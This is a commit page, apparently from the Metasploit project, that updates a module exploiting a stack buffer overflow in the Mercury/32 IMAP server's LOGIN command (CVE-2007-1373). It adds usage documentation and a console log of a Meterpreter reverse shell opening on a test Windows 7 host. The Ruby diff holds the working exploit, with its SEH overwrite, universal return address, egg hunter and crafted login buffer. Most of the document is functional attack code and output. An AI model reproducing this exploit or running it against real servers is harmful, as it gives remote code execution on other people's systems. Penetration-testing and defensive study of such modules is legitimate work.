Land #10853, Add universal targeting to Mercury/32 IMAP LOGIN exploit
commit
1c340f8202
|
@ -0,0 +1,48 @@
|
|||
Mercury/32 <= 4.01b contains an stack based buffer overflow in IMAPD LOGIN verb. Sending an specially crafted IMAP login command allows remote code execution.
|
||||
|
||||
## Vulnerable Application
|
||||
|
||||
This module exploits a stack buffer overflow in Mercury/32 <= 4.01b IMAPD LOGIN verb. By sending a specially crafted login command, a buffer is corrupted, and code execution is possible. This vulnerability was discovered by (mu-b at digit-labs.org).
|
||||
|
||||
* [Mercury/32 v4.01a](https://www.exploit-db.com/apps/8e0bf8aec964af66a5d440ef705d548f-m32-401a.exe)
|
||||
* [Mercury/32 v4.01b upgrade](http://web.archive.org/web/20070119125847if_/http://ftp.usm.maine.edu/pegasus/Mercury32/m32-401b.zip)
|
||||
|
||||
This module has been tested successfully on:
|
||||
|
||||
* Mercury/32 v4.01a on Windows XP SP3 (x86)
|
||||
* Mercury/32 v4.01a on Windows 7 SP1 (x86)
|
||||
* Mercury/32 v4.01a on Windows Server 2003 Standard Edition SP1 (x86)
|
||||
* Mercury/32 v4.01b on Windows 7 SP1 (x86)
|
||||
|
||||
## Verification steps
|
||||
|
||||
1. Install the vulnerable Mercury/32 application
|
||||
2. Start msfconsole
|
||||
3. Do: `use exploit/windows/imap/mercury_login`
|
||||
4. Do: `set RHOST IP`
|
||||
5. Do: `exploit`
|
||||
6. You should get a shell.
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Mercury/32 v4.01a on Windows 7 SP1 x86
|
||||
```
|
||||
msf > use exploit/windows/imap/mercury_login1
|
||||
msf exploit(windows/imap/mercury_login1) > set rhost 192.168.46.144
|
||||
rhost => 192.168.46.144
|
||||
msf exploit(windows/imap/mercury_login1) > exploit
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.46.1:4444
|
||||
[*] 192.168.46.144:143 - Sending payload (8931 bytes) ...
|
||||
[*] Sending stage (179779 bytes) to 192.168.46.144
|
||||
[*] Meterpreter session 1 opened (192.168.46.1:4444 -> 192.168.46.144:49219) at 2018-10-27 20:43:14 +0200
|
||||
|
||||
meterpreter >
|
||||
Computer : WIN-DQ8ELRSOJAO
|
||||
OS : Windows 7 (Build 7601, Service Pack 1).
|
||||
Architecture : x86
|
||||
System Language : en_US
|
||||
Domain : WORKGROUP
|
||||
Logged On Users : 2
|
||||
Meterpreter : x86/windows
|
||||
```
|
|
@ -4,87 +4,83 @@
|
|||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = AverageRanking
|
||||
Rank = NormalRanking
|
||||
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
include Msf::Exploit::Remote::Seh
|
||||
include Msf::Exploit::Remote::Egghunter
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Mercury/32 LOGIN Buffer Overflow',
|
||||
'Description' => %q{
|
||||
'Name' => 'Mercury/32 4.01 IMAP LOGIN SEH Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a stack buffer overflow in Mercury/32 <= 4.01b IMAPD
|
||||
LOGIN verb. By sending a specially crafted login command, a buffer
|
||||
is corrupted, and code execution is possible. This vulnerability was
|
||||
discovered by (mu-b at digit-labs.org).
|
||||
},
|
||||
'Author' => [ 'MC' ],
|
||||
'Author' =>
|
||||
[
|
||||
'mu-b', # Discovery and exploit
|
||||
'MC', # Metasploit module
|
||||
'Ivan Racic' # Automatic targeting + egg hunter
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2007-1373' ],
|
||||
[ 'OSVDB', '33883' ],
|
||||
['CVE', '2007-1373'],
|
||||
['EDB', '3418']
|
||||
],
|
||||
'Privileged' => true,
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'thread',
|
||||
'EXITFUNC' => 'thread'
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 800,
|
||||
'BadChars' => "\x00\x0a\x0d\x20",
|
||||
'StackAdjustment' => -3500,
|
||||
'Space' => 2500
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Windows 2000 SP0-SP4 English', { 'Ret' => 0x75022ac4 } ],
|
||||
[ 'Windows XP Pro SP0/SP1 English', { 'Ret' => 0x71aa32ad } ],
|
||||
],
|
||||
'DisclosureDate' => 'Mar 6 2007',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
['Windows Universal',
|
||||
{
|
||||
'Ret' => 0x00401460
|
||||
}]
|
||||
],
|
||||
'DisclosureDate' => 'Mar 6 2007',
|
||||
'DefaultTarget' => 0))
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(143)
|
||||
])
|
||||
]
|
||||
)
|
||||
end
|
||||
|
||||
def check
|
||||
connect
|
||||
resp = sock.get_once
|
||||
disconnect
|
||||
|
||||
if (resp =~ /Mercury\/32 v4\.01[a-b]/)
|
||||
return Exploit::CheckCode::Appears
|
||||
end
|
||||
return Exploit::CheckCode::Safe
|
||||
return CheckCode::Vulnerable if resp =~ %r{Mercury/32 v4\.01[ab]}
|
||||
Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
def exploit
|
||||
hunter, egg = generate_egghunter(payload.encoded)
|
||||
connect
|
||||
sock.get_once
|
||||
|
||||
num = rand(255).to_i
|
||||
|
||||
sploit = "A001 LOGIN " + (" " * 1008) + "{#{num}}\n"
|
||||
sploit = 'A001 LOGIN ' + "\x20" * 1008 + "{#{num}}\n"
|
||||
sploit << rand_text_alpha_upper(347)
|
||||
sploit << egg + payload.encoded
|
||||
sploit << rand_text_alpha_upper(7500 - payload.encoded.length - egg.length)
|
||||
sploit << "\x74\x06\x75\x04" + [target.ret].pack('V')
|
||||
sploit << make_nops(20)
|
||||
sploit << hunter
|
||||
sock.put(sploit)
|
||||
sock.get_once
|
||||
|
||||
sploit << rand_text_alpha_upper(255)
|
||||
sock.put(sploit)
|
||||
sock.get_once
|
||||
|
||||
sploit << make_nops(5295 - payload.encoded.length)
|
||||
sploit << payload.encoded + Rex::Arch::X86.jmp_short(6)
|
||||
sploit << make_nops(2) + [target.ret].pack('V')
|
||||
sploit << [0xe8, -1200].pack('CV') + rand_text_alpha_upper(750)
|
||||
|
||||
print_status("Trying target #{target.name}...")
|
||||
|
||||
sock.put(sploit)
|
||||
select(nil,nil,nil,1)
|
||||
|
||||
print_status("Sending payload (#{sploit.length} bytes) ...")
|
||||
handler
|
||||
disconnect
|
||||
end
|
||||
|
|
Loading…
Reference in New Issue